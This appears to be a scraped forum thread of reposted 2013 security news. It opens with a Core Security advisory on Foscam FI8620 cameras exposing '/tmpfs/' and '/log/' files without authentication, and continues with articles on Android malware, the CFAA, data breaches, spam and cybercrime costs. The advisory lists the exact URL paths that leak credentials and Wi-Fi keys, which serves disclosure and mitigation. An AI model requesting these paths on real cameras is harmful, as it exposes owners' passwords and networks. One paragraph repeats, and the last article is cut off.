Matt

Description : Core Security Technologies Advisory - Due to improper access restrictions, the FOSCAM FI8620 device allows a remote attacker the ability to browse and access arbitrary files from the directories '/tmpfs/' and '/log/' without requiring authentication. This could allow disclosure of access credentials and more. Author : Core Security Technologies, Andres Blanco, Flavio de Cristofaro Source : FOSCAM IP-Cameras Improper Access Restrictions ? Packet Storm Code : Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ FOSCAM IP-Cameras Improper Access Restrictions 1. *Advisory Information* Title: FOSCAM IP-Cameras Improper Access Restrictions Advisory ID: CORE-2013-0613 Advisory URL: http://www.coresecurity.com/advisories/foscam-ip-cameras-improper-access-restrictions Date published: 2013-07-23 Date of last update: 2013-07-23 Vendors contacted: Foscam Release mode: User release 2. *Vulnerability Information* Class: Information Exposure [CWE-200] Impact: Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-2574 3. *Vulnerability Description* Due to improper access restriction the FOSCAM FI8620 device [1] allows a remote attacker to browse and access arbitrary files from the following directories '/tmpfs/' and '/log/' without requiring authentication. This could allow a remote attacker to obtain valuable information such as access credentials, Wi-Fi configuration and other sensitive information in plain text. The list of affected files includes, but is not limited to, the following: . 'http://<target_ip>/tmpfs/config_backup.bin' . 'http://<target_ip>/tmpfs/config_restore.bin' . 'http://<target_ip>/tmpfs/ddns.conf' . 'http://<target_ip>/tmpfs/syslog.txt' . 'http://<target_ip>/log/syslog.txt' 4. *Vulnerable Packages* . FOSCAM FI8620 PTZ Camera. . Other Foscam devices based on the same firmware are probably affected too, but they were not checked. 5. *Non-Vulnerable Packages* Vendor did not provide details. Contact Foscam for further information. 6. *Vendor Information, Solutions and Workarounds* There was no official answer from Foscam after several attempts (see [Sec. 9]); contact vendor for further information. Some mitigation actions may be do not expose the camera to internet unless absolutely necessary and have at least one proxy filtering HTTP requests to the following resources: . '/tmpfs/config_backup.bin' . '/tmpfs/config_restore.bin' . '/tmpfs/ddns.conf' . '/tmpfs/syslog.txt' . '/log/syslog.txt' 7. *Credits* This vulnerability was discovered by Flavio de Cristofaro and researched with the help of Andres Blanco from Core Security Technologies. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* 8.1. *Accessing Manufacturer DDNS configuration* By requesting the following URL using your default web browser: /----- http://<target_ip>/tmpfs/ddns.conf -----/ you will see something like this: /----- [LoginInfo] HostName=ddns.myfoscam.org HostIP=113.105.65.47 Port=8080 UserName=<target username> Password=<target plain password> [Domain] Domain=<target username>.myfoscam.org; -----/ 8.2. *Access Credentials Stored in Backup Files* When a configuration backup is required by an operator/administrator, the backup is generated in the local folder 'tmpfs' named as 'config_backup.bin'. The binary file is just a dump of the whole configuration packed as Gzip and can be accessed by accessing the following URL: /----- http://<target_ip>/tmpfs/config_backup.bin -----/ The presence of this temporary file enables an unauthenticated attacker to download the configuration files which contain usernames, plaintext passwords (including admin passwords), Wifi configuration including plain PSK, among other interesting stuff as shown below: /----- username = "admin " password = "admin " authtype = "15 " authgroup = " " [user1] username = "user " password = "user " authtype = "3 " authgroup = " " [user2] username = "guest " password = "guest " authtype = "1 " authgroup = " " -----/ It is important to mention that, in order to access the configuration file previously mentioned, an operator and/or administrator should have executed the backup process in advance. 9. *Report Timeline* . 2013-06-12: Core Security Technologies notifies the Foscam team of the vulnerability. . 2013-06-12: Vendor acknowledges the receipt of the email and asks for technical details. . 2013-06-13: A draft report with technical details and a PoC is sent to vendor. Publication date is set for Jul 3rd, 2013. . 2013-06-17: Core asks if the vulnerabilities are confirmed. . 2013-06-17: Foscam product team notifies that they have checked CORE's website [2], but there is no Foscam info. . 2013-06-18: Core notifies that the advisory has not been published yet and re-sends technical details and proof of concept. . 2013-06-26: CORE asks for a reply. . 2013-07-03: First release date missed. . 2013-07-03: Core asks for a reply. . 2013-07-11: Core notifies that the issues were reported 1 month ago and there was no reply since [2013-06-18]. . 2013-07-23: Core releases the advisory CORE-2013-0613 tagged as user-release. 10. *References* [1] Foscam FI8620 - http://www.foscam.com/prd_view.aspx?id=176. [2] CORE Security Advisories http://www.coresecurity.com/grid/advisories. 11. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 12. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 13. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 14. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

Android malware is becoming more sophisticated, with ransomware and attacks that harvest bank details on the increase, according to Bitdefender. A report from the security software firm highlighted that SMS-based malware – which send texts to premium-rate numbers – is still by far the most common form of Android malware, but more advanced viruses are also on the rise. The firm highlighted an attack that targets text messages related to banking, known as ZitMo. "ZitMo receives commands from a Command and Control server and can forward all incoming SMS messages to it. This is of particular interest to attackers as they can receive the banking mTAN (mobile Transaction Authentication Number) as soon as users initiate the transaction." Almost half of ZitMo reports currently come from China, but European countries such as Germany and Romania are also reporting outbreaks. Ransomware, already a common sight for unwitting PC users, is also on the rise. The malware demands payment in order for users to regain control of their devices and is distributed as antivirus software. Catalin Cosoi, Bitdefender's chief security strategist, said that ransomware is following the same pattern as it did when it first emerged on PCs. "The increased level of sophistication and its similarity with PC ransomware might suggest that Android malware coders are branching out," he said. "Emulating the behaviour of PC malware on Android is no novelty, as we saw in the past how adware gained traction and evolved on the mobile OS." Last week, an Android vulnerability that allowed malicious code to be hidden inside legitimate app installer packages was discovered by security firm Sohpos, which labelled it as an "elementary mistake". Sursa V3.co.uk

Serios? Pune mana si citeste postul meu si imediat citeste-l pe al tau, vezi care dintre noi s-a bagat in seama.

M2G : Iti dai seama ca multi au votat doar de dragul de a vota si ca doar o parte vor si studia respectiva carte. O initiativa buna, am sa ma tin si eu pana la final sper.

There’s a funny catch-22 when it comes to privacy best practices. The very techniques that experts recommend to protect your privacy from government and commercial tracking could be at odds with the antiquated, vague Computer Fraud and Abuse Act (CFAA). A number of researchers (including me) recently joined an amicus brief (filed by Stanford’s Center for Internet and Society in the “Weev” case), arguing how security and privacy researchers are put at risk by this law. However, I’d also like to make the case here that the CFAA is bad privacy policy for consumers, too. It’s not just something that affects hackers and academics. The crux of a CFAA violation hinges on whether or not an action allows a user to gain “access without authorization” or “exceed authorized access” to a computer. The scary part, therefore, is when these actions involve everyday behaviors like clearing cookies, changing browser reporting, using VPNs, and even protecting one’s mobile phone from being identified. The Conveniences and Perils of Cookies By the latest count, users encounter 351 different third-party trackers when visiting popular sites like the Huffington Post, according to a recent study. The companies responsible for much of this tracking have repeatedly refused to honor user preferences, and private tracking technology is increasingly sophisticated at circumventing blocking tools. Clearing cookies limits the profiles advertisers can compile, essentially rendering us as a new user to web services. In fact, the FTC recommends that users clear cookies to protect their private information, and the Treasury Department advises the same — though in that case it’s to make sure their website is loading correctly for users. However, many websites rely on cookies to enforce paywalls. These companies do this so their freemium business models can work transparently, without initially requiring the user to be aware (i.e., log in) until they hit the limit. The New York Times, for example, imposes a 10 articles-a-month limit for non-subscribers, allowing users to browse 10 articles for free but then requiring payment for subsequent use. But the method the New York Times and other publications use to identify users is unreliable and easy to circumvent, even inadvertently. Clearing one’s cookies periodically — or even using a browser’s private browsing mode — bypasses the flimsy paywalls and allows users to continue reading stories. Under an unsophisticated judge’s take, this act could be interpreted as exceeding “authorized access” (of 10 free articles a month) — and is therefore a potential, prosecutable violation of the CFAA. Beware Agent User Beyond cookies, browser fingerprinting is another technique used to uniquely identify users as they browse. The technique essentially works by fingerprinting the combination of which browser a person is using (“user agent”), his/her IP address, and a variety of configuration settings. It’s not unlike human fingerprinting. Changing one’s user agent by altering the browser name that one’s browser reports to the website therefore reduces the accuracy of the fingerprint, making the tracking technique less reliable. However, altering our user agents is potentially problematic because some businesses personalize content and prices based on them. For example, some websites offer a different class of service on Gogo Inflight Wi-Fi, or different hotel prices and packages for Mac customers (Safari) vs. PC customers (Internet Explorer) — remember when Orbitz got caught doing this? Yet changing the user agent — which prevents the above discrimination and tracking — could conceivably exceed the authorized access intended for an individual’s computer device, thus violating the CFAA. Another privacy best practice bites the dust. And VPNs Too Virtual Private Network (VPN) services, which allow users to mask their true IP addresses by routing traffic via endpoints — sometimes in other countries — are basically private tunnels for users to route their traffic. Many companies restrict employee access to internal systems while not physically in the office to VPN only. Using a VPN ensures the data people are sending and receiving is encrypted and safe from prying eyes — such as eavesdropping hackers at Wi-Fi cafes, enterprising ISPs performing deep packet inspection for marketing purposes, or even governments looking to surveil traffic. (Dissidents for example would need to mask their locations in order to circumvent government blocks or surveillance when accessing sensitive content or services.) However, VPN services also allow users to circumvent geographic restrictions that businesses put on their products. That’s why the third largest Internet provider in New Zealand just added a service that masks computer location, so their users could access international content that otherwise wouldn’t be available because some businesses only offer content in geographies they’re able to monetize. Video streaming services like Hulu and the BBC for example rely on users’ IP addresses to restrict access to video content. Using a VPN for privacy reasons could therefore result in inadvertently circumventing the (mediocre) methods video services use to restrict content access. It’s yet another way that protecting oneself could mean violating the law. When Mobile Tracks Your Every Move Nearly every device — not just computers but tablets and smartphones too — has a radio that allows it to communicate with the local wireless hotspot. To identify the device uniquely, this radio has a unique serial number known as its MAC address. Recently, a variety of services have sprouted up that surreptitiously monitor this unique serial number to track us as we move about our day — for example, to follow shoppers through malls to better profile their shopping behaviors. While some of these services provide an opt-out, consumers would have to first know about the service and then find the opt-out page: difficult for something that occurs without our knowledge. (And not surprisingly, when stores do tell consumers they’re tracking them, the information is not well received.) A potentially more effective way to thwart this form of tracking is to change the MAC address serial number on a regular basis using apps such as MacChanger. These apps act like clearing cookies on one’s browser, effectively severing links to past history (i.e., previous shopping activities). However, many public wireless hotspots — like those in airports or coffee shops — rely on the MAC serial number to limit access to certain users. Changing our MAC addresses to protect privacy could therefore land us in violation of the CFAA because it allows us to “exceed authorized access” to a network protected by a system that relies on the persistence of these identifiers to exclude us. It’s a system that won’t let us out. *** We now know how revealing – and huge the amount! — of information we generate is, as we browse the internet or use our phones or just go about our daily lives. The recent revelations about the extent of government surveillance have also made clear that privacy best practices are no longer an academic or tech-savvy fringe enterprise. While cases like Weev’s draw attention to the limitations of the CFAA and our amicus brief argues it could curb necessary research, it’s also important to recognize that the laws that aim to protect us actually limit the valid tools consumers need to protect themselves online. As it is, consumers have only limited recourse in minimizing their digital footprints. Yet the CFAA’s vague language of “authorized access” creates an environment where using technical tools to keep our behavior and content private could violate the law if we access the wrong site. Most users probably don’t have any malicious intent when using any of the above technical tools, and the methods to restrict access to those sites are often very vulnerable to basic workarounds. It seems rather ironic to hold users accountable for the fact that the techniques used to limit or exclude their access are not very sophisticated — and are, arguably, dumb. Sursa Wired.Com

Privacy ninjas want anti-NSA encrypted Android backups Privacy experts have urged Google to allow Android users' to encrypt their backups in the wake of the NSA PRISM surveillance flap. The useful "back up my data" option in Google's Android operating system sends a lot of private information from fandroids' devices to Google's cloud storage service. Such sensitive data includes wireless network passwords, application files and configuration settings. These backed-up bytes are probably stored in an encrypted form on the advertising giant's servers. However, if it is encrypted, then it's Google that has the decryption keys, not the person or organisation that owns the data. As such, the information is vulnerable to secret demands from government agents and cops for that data. If users had the cryptographic keys then at least they are aware of the surveillance and have a chance of personally fighting the request. Micah Lee - a staff technologist at privacy warrior outfit the Electronic Frontier Foundation and the maintainer of HTTPS Everywhere - argues that encrypted backups should be available. He outlined his wishes in a recent post to the Android Open Source Project. "The 'back up my data' option in Android is very convenient. However it means sending a lot of private information, including passwords, in plaintext to Google. This information is vulnerable to government requests for data," Lee writes. Backup data is already encrypted in transit (just like secure web traffic) so it cannot be intercepted by any old miscreant - but users don't have control over the encryption keys to their private data when at rest in Google's machines, a situation Lee would like to see changed. "You could implement this the same way Chrome's sync feature is implemented, with two options: encrypt synced passwords with your Google credentials and encrypt all synced data with your own sync passphrase," Lee argues. "Since backup and restore is such a useful feature, and since it's turned on by default, it's likely that the vast majority of Android users are syncing this data with their Google accounts. Because Android is so popular, it's likely that Google has plaintext wifi passwords for the majority of password-protected wifi networks in the world," he adds. Other security experts echo Lee's concerns. "[The data is] not encrypted in the sense of being inaccessible to anyone except you," explains security industry veteran Paul Ducklin in a post on Sophos's Naked Security blog. "That's obvious because, as a comment on Micah's posting pointed out, you can recover your data from Google even after you've wiped (or lost) your device, or changed your Google account password." "In other words, Google can unilaterally recover the plaintext of your Wi-Fi passwords, precisely so it can return those passwords to you quickly and conveniently even if you forget your device password and have to start over," he added. The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user's home, and include hotels, shops, libraries, friends' houses, offices and all manner of other places. Adding this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents. "The solution is to encrypt everything 'for your eyes only' before you back it up anywhere, especially into the cloud," Ducklin concludes. In a statement, Google said the backup feature is optional and built to be secure. Although a debate on the feature continues on the Android developer forum, Google didn't seem convinced about the need for any changes : Lee concedes that by using an operating system developed by Google that users are extending a fair degree of trust to the Chocolate Factory. His point is not that that trust shouldn't extend to Wi-Fi passwords: at the very least, users should be given a choice. "While using Android requires a certain amount of trusting Google, I don't think it's rational to expect users to trust Google with their plaintext passwords when Google can be compelled to give this data to the US government when they request it," Lee concludes. Sursa TheRegister.co.uk

A software glitch in the New York bicycle-sharing program has led to a breach of customers' names, contact information, credit card numbers and security codes, passwords, and birth dates. ust before launching, the New York bicycle-sharing program Citi Bike accidentally leaked the private account information of 1,174 of its customers, according to the Wall Street Journal. The data was exposed via a software glitch and included customers' names, contact information, credit card numbers and security codes, passwords, and birth dates. While the data leak apparently took place on April 15, a few weeks before the program launched in the city, the company didn't notify the affected customers until July 19. According to the Wall Street Journal, Citi Bike discovered the breach at the end of May and corrected it immediately. "Notifications such as these are standard legal disclosures in any case where there is even the potential for information to have been improperly accessed. This potential security issue affected 1,174 of NYC Bike Share's approximately 180,000 customers," New York City Department of Transportation spokesman Seth Solomonow told CNET. "While there is no evidence that any personal information was maliciously accessed or misused, NYC Bike Share engaged a security firm to investigate and recommend appropriate steps to make notifications and safeguard its customers, including to provide identity and credit monitoring free of charge." Citi Bike is a city-run bike-sharing program in New York that lets users pick up and drop off bicycles at docking stations throughout the city with a $95 annual membership. The bikes are available 24 hours a day and 365 days a year. When the program launched in late May, more than 16,000 people had already signed up for the bike share. Now, Citi Bike has about 61,000 members and has served 180,000 customers, which includes people buying annual, weekly, and daily passes. Security firm Identity Theft 911 told CNET that affected customers should take certain steps to safeguard their private information. Identity Theft 911 chairman Adam Levin said that users should change their passwords for other Web sites if they used the same password, watch out for e-mail and text scams, and place a fraud alert on their credit file. Sursa News.Cnet.com

Almost 30% of all net addresses in Belarus are blocked by anti-spam firms because of the amount of junk mail passing through them, says a report. East European nations top the list of countries with the largest percentage of blacklisted net addresses, said security firm Cloudmark. It said Belarus had become popular among spammers as other nations cracked down on junk-mail senders. The US was still the single biggest source of spam, it said, Belarus (27.4%), Romania (22.3%) and Russia (3%) filled the top three slots of a list of nations that have IP addresses known to be sources of spam, said Cloudmark researcher Andrew Conway. Now, he said, data traffic from just over three million Belarusian IP addresses was being blocked in an attempt to stem the flood of junk mail passing through them. Paul Ducklin, security researcher at Sophos, said Belarus's ratio of junk-sending IP addresses to population meant it was "way out at the top" of its list of spam senders per capita. "It's been the worst per person all year," said Mr Ducklin, adding that despite its small size it was closing in on the US as the single biggest source of spam in the world. "Belarus is in a league of its own at the moment," he said. Mr Conway from Cloudmark said Belarus's rapid rise was the consequence of other Eastern European nations, such as Russia, getting better at stamping out spam sources. In addition many hosting firms and ISPs in other countries were reacting much more quickly, he said, which left spammers looking for places where they could act with impunity. Belarussian ISPs and hosting companies had also become a favourite among Romanian spam gangs, he said, who were being flushed out of other networks. The percentages were a historic high, said Mr Conway, and indicative of serious trouble. "Typically when we look at individual hosting companies if we are blocking more than 1% of the total they have a problem," he said. Lax security controls by Belarussian net firms meant it was taking the blame for cyber criminals more than likely based outside the country, said Mr Conway. Most spam is now routed through hijacked machines and is rarely generated in the nations from which it seems to emanate. The large scale blacklisting would have a knock-on effect on legitimate businesses, he warned. "It'll cause problems for people who are there that want to send email internationally," said Mr Conway. Sursa BBC.co.uk

Infractionalitatea cibernetica si spionajul insumeaza intre 300 miliarde dolari si 1 trilion dolari in pierderi anuale globale, releva un studiu. Firma de securitate McAfee a finantat studiul efectuat de catre Centrul pentru Studii Strategice si Internationale (CSIS), care a cuantificat impactul economic al infractionalitatii cibernetice, dupa ani de presupuneri in acest sens. CSIS a apelat la ajutorul economistilor, expertilor in proprietate intelectuala si cercetatorilor in domeniul securitatii, pentru a construi un model economic si o metodologie, care au dezvaluit ca pierderile la nivel global sunt mai mici decat se estima anterior. Astfel, raportul a aratat ca pragul superior al pierderilor este de 1 trilion dolari. De asemenea, raportul a pus costurile in contextul PIB global, subliniind ca acestea reprezinta doar intre 0,4% si 1,4%, comparativ cu pierderi de 600 miliarde dolari datorate traficului de droguri, care reprezinta 5% din PIB-ul global. Autorii studiului au remarcat ca este dificil a se baza pe metode precum anchetele, deoarece companiile care isi dezvaluie pierderile cibernetice de multe ori nu pot estima si cuantifica in mod corespunzator aceste sume. In scopul cercetarii, CSIS a clasificat activitatea rau intentionata in sase domenii: - pierderea proprietatii intelectuale; - infractionalitatea cibernetica; - costuri de oportunitate, inclusiv intreruperile serviciilor si reducerea increderii in activitatile online; - costurile suplimentare pentru securizarea retelelor, asigurare si recuperare in cazul producerii atacurilor cibernetice; - prejudiciul reputational pentru compania atacata; - masurarea pierderilor asociate cu atacurile cibernetice. "Noi credem ca raportul CSIS este primul care foloseste modelul economic actual pentru a construi cifre aferente pierderilor datorate activitatii cibernetice rau intentionate", a declarat Mike Fey, vicepresedinte executiv si chief technology officer in cadrul McAfee. Astfel cum recunoaste noul studiu, costurile activitatii cibernetice rau intentionate implica mai mult decat pierderile activelor financiare sau proprietatii intelectuale si ia in considerare si daunele aduse brandului si reputatiei, pierderile consumatorilor datorate fraudelor, costurile de oportunitate pentru intreruperile de servicii, "curatarea" dupa atacurile cibernetice si cheltuielile crescute in ceea ce priveste securitatea cibernetica. "Acest raport este, de asemenea, primul care leaga activitatea cibernetica rau intentionata de pierderea locurilor de munca", a declarat James Lewis, co-autor al raportului CSIS. Autorii estimeaza ca 508.000 locuri de munca din SUA se pierd, potential, in fiecare an, datorita spionajului cibernetic. In timp ce acest prim raport CSIS construieste un model pentru a cuantifica pierderile directe provenind din infractionalitatea cibernetica si spionajul cibernetic, un al doilea raport analizeaza pierderile de securitate in ceea ce priveste ritmul de inovare, fluxul comercial si costurile asociate cu infractionalitatea si pierderea locurilor de munca. Autorii raportului au declarat ca miezul problemei consta in efectul costurilor privind infractionalitatea cibernetica si spionajul cibernetic asupra comertului, tehnologiei si competitivitatii. "Raspunsul la aceste probleme ne va ajuta sa punem problema in contextul sau strategic", au explicat autorii studiului. Sursa: Computerworld - IT news, features, blogs, tech reviews, career advice

'Higher level of paranoia' suggests EU and US users should change passwords French-based server host OVH has warned that its systems have been penetrated in a multi-stage attack that leaves US and European customers at risk. In an advisory on its forum board, the company warned that an attacker had gained control of a system administrator's account, and used that to gain access to a VPN account of one of the firm's backoffice staff. This was used to get the personal data of customers in Europe and from a hosting firm in Canada. "Overall, in the coming months the back office will be under PCI-DSS which will allow us to ensure that the incident related to a specific hack on specific individuals will have no impact on our databases," the company said. "In short, we were not paranoid enough so now we're switching to a higher level of paranoia. The aim is to guarantee and protect your data in the case of industrial espionage that would target people working at OVH." European customers' surname, first name, nic, address, city, country, telephone, fax, and encrypted password are all open to the attackers, and customers of the firm's Canadian hosting company have ben advised to change SSH keys to ensure a secure connection. The company is staying mum about what exact data has been scraped, but has filed a complaint about the issue to local judicial authorities. This isn't the first time OVH has suffered an attack. Back in May the company warned that its backoffice functions had been breached by hackers unknown and passwords were stolen. Sursa TheRegister.co.uk

Possible data loss as SSDs fail during terabyte transfer, service goes down The Darwinian derby to determine which RSS-reading service would replace Google Reader as the world's dominant feed-wrangler may just have produced its first extinction event, after theoldreader.com choked on its recently-enlarged database and crashed. The Old Reader's schtick is that it looks and behaves pretty much exactly like Google Reader, which made it a nice alternative for refugees. As the graphs below (taken from the service's blog) show, user numbers have surged from around 10,000 in March to over 375,000 today. http://regmedia.co.uk/2013/07/24/the_old_reader_growth.png That July 5th post also says the outfit uses “... this amazingly cheap but somewhat unreliable hosting provider” that has led to “some issues with our database servers” and outages. Old Reader seems to have decided to do something about that, but the something has failed. As the company now says, in an “Important Update” a weekend attempt to migrate to new servers has failed. “On Saturday (July 20) we moved over a terabyte of data from one storage system to another,” the blog reports. Things went fine until “we started seeing a higher I/O load after we finished, and suddenly one SSD drive in one of our database servers stopped working.” A second SSD in another disk then failed, and then another pair also fell over. One of those was in a server that was in the process of restoring data. At some point it all got too much and the service ground to a halt. The Old Reader's site is now displaying apologies, cat photos and a promise that a fix “will probably take a day or two”. Sursa TheRegister.co.uk

A group of researchers led by a Monash Univeristy PhD student has demonstrated an all-optical technique for dealing with nonlinearity – something that considerably boosts the throughput of an optical system. The demonstration is important for two reasons. One is that fibre optic cables used to transport signals over long distances need occasional boosters. As you'll read below, this demonstration renders those unnecessary, a boon for network operators. The second is speed. At 1.8 1.8 Tbps on a single fibre path, this technology has the potential to upgrade even modest extant fibre systems (that typically have many such paths) to hundreds of terabits per second. The technique that makes this all possible is mid-span spectral inversion (MSSI), and has been known since the 1990s. By inverting the spectrum of the optical signal – that is, changing the long wavelengths to short and vice-versa – MSSI adds a “pre-emphasis”, shaping the signal in such a way that non-linearities in the second half of the fibre “reverse” the effect of non-linearities in the first half. In other words, by reversing the time order of the wave-front, the fibre's nonlinearity – which distorts what started out as a nice optical pulse – helps reconstruct the original pulse. The downside is that this usually requires active electronics to be inserted into the path, which may not always be convenient. In his paper, Monash PhD student Monir Morshed, working with collaborators from CUDOS in Sydney and Melbourne, describes an all-optical MSSI implementation, eliminating the active electronics. Instead, an all-photonic optical phase conjugation unit (the bit that performs the inversion) was inserted at the midpoint of the total 800 km link. The paper, which was deemed important enough to be accepted as a post-deadline presentation at the recent Kyoto OptoElectronics and Communications Conference (OECC), states: “Using 1.21 Tbit/s through 10×80-km fibers with EDFA amplification we show that MSSI improves the nonlinear threshold by 2.8 dB”. For an 800 km link on a single fibre, Monash University claims the technique offers more than ten times the capacity of current systems. Because it's an all-optical approach, the key component – the optical phase conjugator – could be retrofitted to any suitable fibre. Sursa TheRegister.co.uk

Oz PhD student demos 1.8 Tbps, 800 Km link Asian telcos came out top in a new global study of the prepaid mobile market by KPMG designed to find the best customer experience in-store and over-the-phone, with the UK, US and Australia all placing disappointingly outside the top ten. The In Search of a Better Customer Experience study (PDF) rated 106 mobile providers across 25 countries. KPMG used mystery shoppers to carry out over 850 store visits and 750 calls to contact centres, with providers assessed according to a variety of criteria including average wait times, ease-of-understanding, agent/sales consultant soft skills and use of voice recognition technology. Overall in-store scores by country put China (82 per cent) in top spot followed by Indonesia (79 per cent) and Singapore (76 per cent). Somewhat disappointingly the US came down in 11th place with a score of 68.5 per cent and the UK just behind with 68.3 per cent, while Australia came in 18th with 65.7 per cent, beaten by countries including Vietnam, India and Mexico. Common problems seen by KMG which may have contributed to the poor scores included unavailability of SIMs and long wait times. The report had the following : Tellingly, fewer than 40 per cent of US and UK mobile stores had a concierge, with the number dropping to around 20 per cent for Australia. In China and Singapore the figure was 100 per cent. When it came to contact centres, China again came top (87.5 per cent), this time followed by Portugal (86.4 per cent) and Poland (83.6 per cent). New Zealand crept into 8th with 75.7 per cent but the rest of the top ten was mainly filled with more Asian countries. Again, more “mature” markets in the West performed badly, with the UK in 12th (74 per cent), US in 18th (71 per cent) and Australia in 19th (69.9 per cent). A common criticism of failing telcos was complex and non-intuitive Interactive Voice Response (IVR) systems. The report added the following, which will ring bells with UK mobile customers : Tellingly, fewer than 40 per cent of US and UK mobile stores had a concierge, with the number dropping to around 20 per cent for Australia. In China and Singapore the figure was 100 per cent. When it came to contact centres, China again came top (87.5 per cent), this time followed by Portugal (86.4 per cent) and Poland (83.6 per cent). New Zealand crept into 8th with 75.7 per cent but the rest of the top ten was mainly filled with more Asian countries. Again, more “mature” markets in the West performed badly, with the UK in 12th (74 per cent), US in 18th (71 per cent) and Australia in 19th (69.9 per cent). A common criticism of failing telcos was complex and non-intuitive Interactive Voice Response (IVR) systems. The report added the following, which will ring bells with UK mobile customers : Long wait times before being put through to an agent post IVR selection were also highlighted, and it’s no surprise here that the UK and US performed fairly poorly at around the 1 minute mark, with China down nearer 10 seconds. It should be noted that Asian countries have a relatively high penetration of prepaid mobile users compared to, say, the UK and therefore their telcos should be expected to deal better with this type of customer. However, the report still serves to highlight persistent deficiencies with customer service in markets like the UK, US and Oz where telcos have been doing this for a lot longer. Sursa TheRegister.co.uk

China produces the most internet attack traffic in the world, although its lead at the top of the charts has been threatened by Indonesia. Data from network firm Akamai in its quarterly State of the Internet report found that in the first quarter of 2013 a total of 34 percent of attacks originated in China. However, this was down from 41 percent in the previous quarter at the end of 2012. This drop was due in part to a huge rise in traffic from Indonesia, which rose from just 0.7 percent to 21 percent in the quarter. Akamai said this was most likely due to a rise in botnet activity in the nation. The US was third, at 8.3 percent, with Turkey fourth on 4.5 percent and Russia fifth at 2.7 percent. All of these numbers represented a decline, which is also most likely due to the huge increase in attacks being sent from Indonesia. The numbers do not necessarily mean the attacks are being carried out by persons in the nations, as cyber criminals in another nation could be redirecting attacks via compromised systems to make them appear as if they are coming from that country, Akamai noted. Distributed denial of service (DDoS) attacks also rose in the first quarter of 2013, with 208 reported to Akamai, up from 200 in the same quarter in 2012. The majority of the attacks, 72, targeted enterprises, with the financial services market receiving 36 attacks. Energy firms faced five attacks, as did the automotive industry. Akamai said the threat to enterprise was likely to grow over time, based on the data the firm was seeing. “The number of DDoS attacks Akamai encounters shows every indication of continuing to grow, with nearly 5 percent more attacks being reported in the first quarter of 2013 as compared to the fourth quarter of 2012,” the report said. “It remains difficult to determine the nature of the attackers because botnets are necessary to create the attacks, and the command and control (C&C) infrastructures of these botnets are designed to protect their owners.” In other areas of the report, the firm reported a rise in the average internet speed around the world by four percent to 3.1Mbps. South Korea retained its top position, with an average speed of 14.2Mbps, while the UK hit 7.9Mbps, up from 6.5Mbps last year. Other good news for the UK is that over 20 percent of the nation can now access speeds of above 10Mbps, up from 11 percent in the last quarter. Akamai’s data is based on almost 700 million unique IP addresses connected to its monitoring platform, which can monitor connection speeds and security incidents. Sursa V3.co.uk

David Cameron has admitted his plans for opt-out content filters will face "many problems" as his proposals begin to take shape, and said that content such as The Sun's Page 3 or Fifty Shades of Grey would not face the axe. Cameron had asked internet service providers (ISPs) to make adult content filters an opt-in decision, but admitted on the BBC's Jeremy Vine programme that it would be up to the ISPs to decide what to block, suggesting that pornography and self-harming sites would be in their crosshairs. "It will depend on how the companies choose to do it," he said. "It doesn't mean, for instance, it will block access to a newspaper like The Sun, it wouldn't block that, but it would block pornography." He admitted there would be occasions in which these filters would fail, and that they "don't work in every instance. We're not saying it's the be all and end all answer to the problem," he explained. In addition, he said he did not believe that written pornography – Vine mentioned Fifty Shades of Grey – would be blocked by ISPs, but he remained cautious in saying that ISPs would be the decision-makers in the process. "I'm not saying we've thought of everything and there will be many problems down the line as we deal with this, but we're trying to crunch through these problems and work out what you can do and can't do," he insisted. Cameron's proposals were met with a mixed reaction yesterday. Parent groups and children's charities backed his ideas, while organisations supporting an open internet criticised the prime minister for not understanding how filters really work. Sursa V3.co.uk

Espionage-focused cyber attacks on businesses have cost over 508,000 US citizens their jobs, according to McAfee and the Center for Strategic and International Studies (CSIS). The security firm and non-profit organisation revealed the news in their joint Estimating the Cost of Cybercrime and Cyber Espionage paper, confirming that the impact of a successful cyber attack extends beyond purely financial damage. CSIS director and senior fellow of the Technology and Public Policy Program, James Lewis said the job losses could have disastrous consequences for nations' wider economies as well as the individuals concerned. "Using figures from the Commerce Department on the ratio of exports to US jobs, we arrived at a high-end estimate of 508,000 US jobs potentially lost from cyber espionage. As with other estimates in the report, however, the raw numbers might tell just part of the story. If a good portion of these jobs were high-end manufacturing jobs that moved overseas because of intellectual property losses, the effects could be more wide ranging," he said. McAfee executive vice president Michael Fey said the job losses are likely due to a lack of understanding by companies about what to do after suffering a data breach. "As policymakers, business leaders and others struggle to get their arms around why cyber security matters, they need solid information on which to base their actions," he said. Within the UK the government has already launched several initiatives designed to help businesses that have suffered a breach. These include the launch of a new cyber security awareness campaign by the Home Office and the formation of the Cyber Security Information Sharing Partnership (CISP). CISP is an initiative launched in March designed to facilitate information-sharing about cyber threats between the public and private sector. The report found that as well as job losses, successful cyber raids are costing the US economy between £100bn-$500bn every year. McAfee said the cost largely stems from the loss of financial assets or intellectual property, damage to brand and reputation, consumer losses from fraud, service disruptions following the attack and the basic cost of cleaning up the mess left following a breach. The news follows widespread warnings from the security industry claiming state and criminal hackers are developing new ways to steal businesses data. Most recently security firm Context reported 